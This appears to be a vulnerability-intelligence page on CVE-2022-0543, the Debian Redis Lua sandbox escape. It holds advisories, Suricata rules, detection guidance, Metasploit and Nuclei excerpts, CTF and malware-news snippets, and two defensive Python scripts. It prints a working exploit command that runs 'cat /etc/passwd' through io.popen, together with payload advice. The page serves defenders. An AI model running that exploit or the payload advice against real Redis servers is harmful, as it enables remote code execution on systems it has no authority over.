CVE-2022-0543
Published 2022-02-18
Priority: P1 (98) · critical · CVSS 3.1 base score 10.0
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H
Flags: CISA KEV (remediation due 2022-04-18) · exploited in the wild · public exploit available · used for initial access
EPSS: 99.67% (99.9th percentile)
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Affected
Debian package versions; the six source entries collapse to two distinct ranges:
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | redis (bullseye) | < 5:6.0.16-1+deb11u2 | 5:6.0.16-1+deb11u2 |
| debian | redis (bookworm, trixie, forky, sid) | < 5:6.0.16-2 | 5:6.0.16-2 |
Detection & IOCs (extracted from the sources below)
Exploit command observed in the sources (loads the system Lua io library through package.loadlib, then runs a shell command via io.popen):
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); local res = f:read("*a"); f:close(); return res' 0
Detection guidance:
- Monitor for outbound connections from Redis processes to port 60100, which P2PInfect uses for P2P C2 communication after exploiting CVE-2022-0543.
- Detect the P2PInfect initial payload download by monitoring for plaintext HTTP GET requests to the '/linux', '/miner', '/winminer' or '/windows' paths originating from Redis processes.
- Monitor Redis processes for use of /dev/tcp for outbound network connections, a technique the P2PInfect exploit payload uses to reach its C2.
- Detect P2PInfect MIPS variant propagation by monitoring for SFTP/SCP uploads of ELF binaries to SSH servers using weak credentials, and for attempts to install the OpenWRT package named 'redis-server'.
- Hunt for P2PInfect evasion: processes reading '/proc/self/status' to check 'TracerPid', and system calls that disable Linux core dumps; both are anti-analysis techniques of the latest P2PInfect variant.
- The vulnerability only affects Redis on Debian and Ubuntu (and derived) distributions because of a packaging issue; scope detection to those OS families.
- The Nuclei template for CVE-2022-0543 confirms a successful sandbox escape by matching the regex 'root:.*:0:0:' in the Redis EVAL response.
Exploitation notes:
- CVE-2022-0543 is not a vulnerability in Redis itself: it is a Debian/Ubuntu packaging issue with the Lua library. Redis instances on other distributions are not affected.
- Staged Meterpreter payloads fail on typical Debian/Ubuntu Redis deployments because the service unit runs with the systemd 'MemoryDenyWriteExecute' hardening option (mprotect to RWX is refused); use stageless payloads for testing.
- The Metasploit module only supports x86_64, though the vulnerability could in principle be exploited on i386, arm, ppc and other architectures.
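The public checks above (the Nuclei `root:.*:0:0:` match, the eval command in the IOC line) confirm the bug by actually running `cat /etc/passwd` through `io.popen`. Where that is not acceptable on a production host, the following added example (written for this page in Python; it is not the Nuclei template, the Metasploit module or any vendor code) probes only the precondition: whether the Lua sandbox exposes a `package` table with a `loadlib` function. It assumes that fixed Debian/Ubuntu packages, like upstream builds that never load the Lua package library, leave no `package` global reachable from scripts, and it speaks RESP over a plain socket so it needs no client library; host, port and password are runtime arguments.

```python
"""Non-destructive remote probe for CVE-2022-0543 (Debian/Ubuntu Redis builds).

Added example for this page; not the Nuclei template, the Metasploit module
or vendor code. Where those confirm the bug by popen'ing /etc/passwd, this
probe only asks the Lua sandbox whether the `package` library and
`package.loadlib` are reachable, which is the precondition the escape needs.
Assumption: a fixed Debian/Ubuntu package (and an upstream build, which never
loads the package library) leaves no `package` table reachable from scripts.
"""
import socket
import sys
from typing import Optional, Tuple

# rawget bypasses the _G metatable Redis installs, so a missing global yields
# nil instead of the "attempted to access nonexistent global variable" error.
PROBE_SCRIPT = (
    'local p = rawget(_G, "package") '
    'if type(p) == "table" and type(p.loadlib) == "function" then '
    'return "loadlib-exposed" end '
    'return "loadlib-absent"'
)


def encode_command(*args: str) -> bytes:
    """Serialise a command as a RESP multi-bulk array (what redis-cli sends)."""
    out = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)


def parse_reply(buf: bytes) -> Tuple[str, Optional[str]]:
    """Decode one RESP2 reply of the kinds AUTH and this EVAL can return.

    Returns (kind, payload) with kind in status/error/integer/bulk/null.
    """
    head, _, rest = buf.partition(b"\r\n")
    tag, body = head[:1], head[1:]
    if tag == b"+":
        return "status", body.decode()
    if tag == b"-":
        return "error", body.decode()
    if tag == b":":
        return "integer", body.decode()
    if tag == b"$":
        size = int(body)
        return ("null", None) if size < 0 else ("bulk", rest[:size].decode())
    raise ValueError("unsupported RESP reply: %r" % buf[:16])


def assess(reply: bytes) -> str:
    """Map the probe's reply to a verdict; error replies (NOAUTH, NOPERM) stay undetermined."""
    kind, payload = parse_reply(reply)
    if kind == "bulk" and payload == "loadlib-exposed":
        return "VULNERABLE"
    if kind == "bulk" and payload == "loadlib-absent":
        return "NOT_VULNERABLE"
    return "UNDETERMINED (%s)" % (payload if kind == "error" else kind + " reply")


def read_reply(sock: socket.socket) -> bytes:
    """Read exactly one RESP reply, including the body of a bulk string."""
    data = b""
    while b"\r\n" not in data:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("connection closed")
        data += chunk
    head = data.split(b"\r\n", 1)[0]
    if head.startswith(b"$") and int(head[1:]) >= 0:
        need = len(head) + 2 + int(head[1:]) + 2
        while len(data) < need:
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("connection closed")
            data += chunk
    return data


def check_host(host: str, port: int = 6379, password: Optional[str] = None,
               timeout: float = 5.0) -> str:
    """Connect, optionally AUTH, send the probe and return the verdict string."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if password:
            s.sendall(encode_command("AUTH", password))
            kind, payload = parse_reply(read_reply(s))
            if kind == "error":
                return "UNDETERMINED (AUTH failed: %s)" % payload
        s.sendall(encode_command("EVAL", PROBE_SCRIPT, "0"))
        return assess(read_reply(s))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    secret = sys.argv[2] if len(sys.argv) > 2 else None
    print(target, check_host(target, password=secret))
```

Run it as `python3 probe.py <host> [password]`. An error reply (NOAUTH when the server requires a password, NOPERM when the ACL denies EVAL) is reported as undetermined rather than as not vulnerable, because in that case the probe script never executed; only the bulk reply `loadlib-absent` is evidence that the `package` table is unreachable.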
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 10.0 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| osv | n/a | 10.0 | CRITICAL | n/a |
| vulncheck | n/a | 10.0 | CRITICAL | n/a |
| cisa | n/a | 10.0 | CRITICAL | n/a |
| vendor_debian | n/a | 10.0 | CRITICAL | n/a |
GHSA
GHSA-9wpj-h5jq-88p9 (ghsa_unreviewed · 2022-02-19 · CRITICAL · CWE-862)
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
OSV
CVE-2022-0543 (osv · 2022-02-18 · CVSS 10.0 · CRITICAL)
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
VulnCheck
Debian-specific Redis Server Lua Sandbox Escape Vulnerability (vulncheck · 2022 · CVSS 10.0 · CRITICAL · CWE-862)
Redis is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Affected: Redis Debian-specific Redis Servers
Required Action: Apply updates per vendor instructions.
Exploitation References:
- https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://blog.aquasec.com/redigo-redis-backdoor-malware
- https://cybersecuritynews.com/hackers-drops-bakcdoor-malware-redigo-redis-server/
- https://www.aquasec.com/blog/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-enterprise-applicati
CISA
Debian-specific Redis Server Lua Sandbox Escape Vulnerability (cisa · added 2022-03-28 · CVSS 10.0 · CRITICAL · CWE-862)
Redis is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Affected: Redis Debian-specific Redis Servers
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-0543
Remediation Due Date: 2022-04-18
Ubuntu
Redis vulnerability (vendor_ubuntu · 2022-03-08)
Summary: Redis could be made to run programs if it received specially crafted network traffic from an authenticated user.
Reginaldo Silva discovered that due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2022-0543: redis (vendor_debian · 2022 · CVSS 10.0 · CRITICAL)
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Scope: local
Status by suite:
| Suite | Status | Fixed in |
|---|---|---|
| bullseye | resolved | 5:6.0.16-1+deb11u2 |
| bookworm | resolved | 5:6.0.16-2 |
| trixie | resolved | 5:6.0.16-2 |
| forky | resolved | 5:6.0.16-2 |
| sid | resolved | 5:6.0.16-2 |
Suricata
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2 (sid 2067133 · suricata · 2026-01-27 · CVSS 10.0 · CRITICAL)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2"; flow:established,to_server; content:"package|2e|loadlib|28|"; fast_pattern; content:"|22|luaopen_"; within:200; reference:cve,2022-0543; classtype:attempted-admin; sid:2067133; rev:1; metadata:attack_target Server, created_at 2026_01_27, cve CVE_2022_0543, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2026_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2 (sid 2035719 · suricata · 2022-04-04 · CVSS 10.0 · CRITICAL)
Rule: alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2"; flow:established,to_server; content:"package|2e|loadlib|28|"; fast_pattern; content:"liblua"; within:500; content:".execute|28|"; distance:0; reference:url,blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers; reference:url,www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce; reference:cve,2022-0543; classtype:attempted-admin; sid:2035719; rev:2; metadata:affected_product Redis, attack_target Server, created_at 2022_04_04, cve CVE_2022_0543, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_04_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acc
Suricata
ET EXPLOIT Possible Redis RCE Attempt - Dynamic Importing of liblua (CVE-2022-0543) (sid 2035720 · suricata · 2022-04-04 · CVSS 10.0 · CRITICAL)
Rule: alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Possible Redis RCE Attempt - Dynamic Importing of liblua (CVE-2022-0543)"; flow:established,to_server; content:"package|2e|loadlib|28|"; fast_pattern; content:"liblua"; within:500; reference:url,blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers; reference:url,www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce; reference:cve,2022-0543; classtype:attempted-admin; sid:2035720; rev:2; metadata:affected_product Redis, created_at 2022_04_04, cve CVE_2022_0543, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_04_04;)
Suricata
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M1 (sid 2035718 · suricata · 2022-04-04 · CVSS 10.0 · CRITICAL)
Rule: alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M1"; flow:established,to_server; content:"package|2e|loadlib|28|"; fast_pattern; content:"liblua"; distance:0; content:".popen|28|"; distance:0; reference:url,blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers; reference:url,www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce; reference:cve,2022-0543; classtype:attempted-admin; sid:2035718; rev:2; metadata:affected_product Redis, attack_target Server, created_at 2022_04_04, cve CVE_2022_0543, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_04_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acces
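To see on captured traffic which of the four ET signatures above a given EVAL would trip, and why they differ, here is an added example written for this page in Python; it is not an Emerging Threats rule and not code from any tool listed here. It decodes the RESP multi-bulk request that redis-cli and most client libraries send, extracts the Lua body of EVAL, and approximates each rule's content chain (content, within, distance) as byte tests. The captures it runs on are constructed: sample A is the eval command from the IOC section, samples B (os.execute instead of io.popen) and C (single-quoted Lua strings) are hypothetical variants, and D is benign traffic. The rule labels are the sids from the rules above with a short tag added here.

```python
"""Triage captured Redis client traffic for CVE-2022-0543 exploit attempts.

Added example for this page (not an Emerging Threats rule, not code from any
tool listed here). Decodes the RESP multi-bulk request redis-cli and most
clients send, extracts the Lua body of EVAL, and applies byte tests equivalent
to the four ET signatures quoted above. Inline (non-RESP) commands are not
handled. All sample payloads are constructed for the demo.
"""
import re
from typing import Dict, Iterator, List, Optional, Tuple

def parse_resp_array(buf: bytes) -> Tuple[Optional[List[bytes]], bytes]:
    """Decode one RESP array at the start of buf -> (args, rest); args is None
    when no complete array is present yet."""
    if not buf.startswith(b"*"):
        return None, buf
    head, sep, rest = buf.partition(b"\r\n")
    if not sep:
        return None, buf
    args: List[bytes] = []
    for _ in range(int(head[1:])):
        if not rest.startswith(b"$"):
            return None, buf
        blen, sep, rest = rest.partition(b"\r\n")
        size = int(blen[1:])
        if not sep or len(rest) < size + 2:
            return None, buf
        args.append(rest[:size])
        rest = rest[size + 2:]
    return args, rest

def eval_scripts(stream: bytes) -> Iterator[bytes]:
    """Yield the Lua source of every EVAL in a client-to-server byte stream."""
    while stream:
        args, stream = parse_resp_array(stream)
        if args is None:
            break
        if len(args) >= 3 and args[0].upper() == b"EVAL":
            yield args[1]

LOADLIB = b"package.loadlib("
# (label, content after loadlib, within: window in bytes or None for a plain
# distance:0, optional later content). Labels are the sids of the rules above.
ET_RULES = [
    ("2035718 M1", b"liblua", None, b".popen("),
    ("2035719 M2-2022", b"liblua", 500, b".execute("),
    ("2035720 liblua-import", b"liblua", 500, None),
    ("2067133 M2-2026", b'"luaopen_', 200, None),
]

def matching_sids(script: bytes) -> List[str]:
    """Labels of the ET content chains the script satisfies."""
    start = script.find(LOADLIB)
    if start < 0:
        return []
    after = script[start + len(LOADLIB):]
    hits = []
    for label, first, window, second in ET_RULES:
        pos = after.find(first, 0, window)  # within:N -> must end inside N bytes
        if pos < 0 or (second and after.find(second, pos + len(first)) < 0):
            continue
        hits.append(label)
    return hits

# Library path and entry symbol handed to loadlib, with either quote style.
LOADLIB_CALL = re.compile(rb"""package\.loadlib\(\s*(["'])([^"']+)\1\s*,\s*(["'])(\w+)\3""")

def loadlib_targets(script: bytes) -> List[Tuple[str, str]]:
    return [(m.group(2).decode(), m.group(4).decode()) for m in LOADLIB_CALL.finditer(script)]

def triage(stream: bytes) -> List[Dict[str, object]]:
    """One record per EVAL: what loadlib is pointed at and which sids fire."""
    return [{"targets": loadlib_targets(s), "sids": matching_sids(s)} for s in eval_scripts(stream)]

def resp(*args: bytes) -> bytes:
    """Encode a command as redis-cli does; used only to build the captures."""
    return b"*%d\r\n" % len(args) + b"".join(b"$%d\r\n%s\r\n" % (len(a), a) for a in args)

LIB = b"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0"
# Constructed captures: A is the eval from the IOC section of this page; B and C
# are hypothetical variants (os.execute instead of io.popen; single-quoted Lua
# strings); D is benign traffic.
SAMPLE_A = resp(b"EVAL", b'local io_l = package.loadlib("' + LIB + b'", "luaopen_io"); '
                b'local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); '
                b'local res = f:read("*a"); f:close(); return res', b"0")
SAMPLE_B = resp(b"EVAL", b'local os_l = package.loadlib("' + LIB + b'", "luaopen_os"); '
                b'local os = os_l(); return os.execute("id")', b"0")
SAMPLE_C = resp(b"EVAL", b"local io_l = package.loadlib('" + LIB + b"', 'luaopen_io'); "
                b"local io = io_l(); return io.popen('id'):read('*a')", b"0")
SAMPLE_D = resp(b"PING") + resp(b"GET", b"session:42")

if __name__ == "__main__":
    for name, cap in (("A", SAMPLE_A), ("B", SAMPLE_B), ("C", SAMPLE_C), ("D", SAMPLE_D)):
        print(name, triage(cap))
```

Sample A trips M1, the liblua import rule and the 2026 M2 rule; sample B trips the 2022 M2 rule instead of M1 because it uses `.execute(` rather than `.popen(`; sample C, whose Lua strings are single-quoted, trips only the liblua-based rules because sid 2067133 anchors on a double quote before `luaopen_`. That is the trade-off the two families of rules encode: matching `liblua` ties detection to the Debian library path, matching `"luaopen_` ties it to the quoting style of the script.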
Metasploit
Redis Lua Sandbox Escape (metasploit · CVSS 10.0 · CRITICAL)
This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. On a typical `redis` deployment (not docker), this module achieves execution as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload. Redis can be configured with authentication or not. This module will work with either configuration (provided
Nuclei
Redis Sandbox Escape - Remote Code Execution (nuclei · CVSS 10.0 · CRITICAL)
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
Template:
id: CVE-2022-0543
info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
    vulnerability was introduced by Debian and Ubuntu Redis packages that
    insufficiently sanitized the Lua environment. The maintainers failed to
    disable the package interface, allowing attackers to load arbitrary libraries.
  impact: |
    Successf
CTF
Medium Machines / README (ctf_writeups · CVSS 9.1 · CRITICAL)
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Shared / README (ctf_writeups · CVSS 10.0 · CRITICAL)
# Shared - HackTheBox - Writeup
Linux, 30 Base Points, Medium
## TL;DR
To solve this machine, we begin by enumerating open services using `nmap`, finding ports `22`, `80`, and `443`.
***User***: Found the subdomain `checkout.shared.htb` with a SQLi vulnerability. Using SQLi we get the MD5 password hash of the `james_mason` user. By running `pspy64` we find that `dan_smith` runs `ipython` from the `/opt/scripts_review` directory (which we can write to). Using `CVE-2022-21699` we get the SSH private key of the `dan_smith` user.
***Root***: Found the binary `/usr/local/bin/redis_connector_dev`. Running it locally gives us the `redis-cli` password. Using `CVE-2022-0543` we get RCE as `root`.
## Shared Solution
CTF
Shared / README (ctf_writeups · CVSS 8.2 · HIGH)
# Shared
## Summary
Running an `nmap` scan finds SSH and a basic online shop powered by [PrestaShop](https://www.prestashop.com) at `https://shared.htb`. We add an item to the cart and try to checkout, which redirects us to `checkout.shared.htb`. The website knows which items are in our cart through a `custom_cart` cookie on the `shared.htb` domain. The cookie references the product code and the quantity that is in our cart. We manually perform a [SQL union injection attack](https://portswigger.net/web-security/sql-injection/union-attacks) on this cookie and read a username and password hash, which can be cracked using [CrackStation](https://crackstation.net/), from the database. With our credentials, we connect to the machine via SSH as the `james_mason` user.
Now that we are on the bo
Bleepingcomputer
Stealthier version of P2Pinfect malware targets MIPS devices (blogs_bleepingcomputer · 2023-12-04 · CVSS 10.0 · CRITICAL) · by Bill Toulas
The latest variants of the P2Pinfect botnet are now focusing on infecting devices with 32-bit MIPS (Microprocessor without Interlocked Pipelined Stages) processors, such as routers and IoT devices.
Due to their efficiency and compact design, MIPS chips are prevalent in embedded systems like routers, residential gateways, and video game consoles.
P2Pinfect was discovered in July 2023 by Palo Alto Networks analysts (Unit 42) as a new Rust-based worm that targets Redis servers vulnerable to CVE-2022-0543.
Following its initial discovery, Cado Security analysts who examined P2Pinfect reported that it was abusing the Redis replication feature to spread, creating replicas of the infected instance.
Later, in Sept
Wiz
Crying Out Cloud - August Newsletter | Wiz (blogs_wiz · 2023-08-30 · CVSS 6.5 · MEDIUM)
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's delve in.
Editor’s note: some of you may have noticed that we accidentally resent last month’s edition (July) – this was due to a technical issue for which we apologize.
Moving on – here are our top picks of cloud security highlights!
## 🐞 High Profile Vulnerabilities
## High severity vulnerabilities in Kubernetes on Windows nodes
Three high severity Kubernetes vulnerabilities were published on August 23. All three are flaws related to insufficient sanitization that could lead to privilege escalation. Kubernetes clusters are only affected by these vulnerabilities if they include Windows nodes. The vulnerabilities were assigned CVE-2023-3676
Unit42
P2PInfect: The Rusty Peer-to-Peer Self-Replicating Worm (blogs_unit42 · 2023-07-19 · CVSS 10.0 · CRITICAL)
William Gamazo, Nathaniel Quist · Published July 19, 2023 · Cloud Cybersecurity Research, Threat Research
## Executive Summary
On July 11, 2023, Unit 42 cloud researchers discovered a new peer-to-peer (P2P) worm we call P2PInfect. Written in Rust, a highly scalable and cloud-friendly programming language, this worm is capable of cross-platform infections and targets Redis, a popular open-source database application that is heavily used within cloud environments. Redis instances can be run on both Linux and Windows operating systems. Unit 42 researchers have identified over 307,000 unique Redis systems communicating publicly over the last two weeks, of which 934 may be vulnerable to this P2P worm variant. While not all of the 307,000 Redis instances will be vulnerable, the worm will still target these systems and attempt the compromise.
The P2PInfect worm infects vulnerable Redis instances by
References
- http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html
- https://bugs.debian.org/1005787
- https://lists.debian.org/debian-security-announce/2022/msg00048.html
- https://security.netapp.com/advisory/ntap-20220331-0004/
- https://www.debian.org/security/2022/dsa-5081
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-0543
Timeline
- 2022-02-18: published
- 2022-03-28: added to CISA KEV
- Exploited in the wild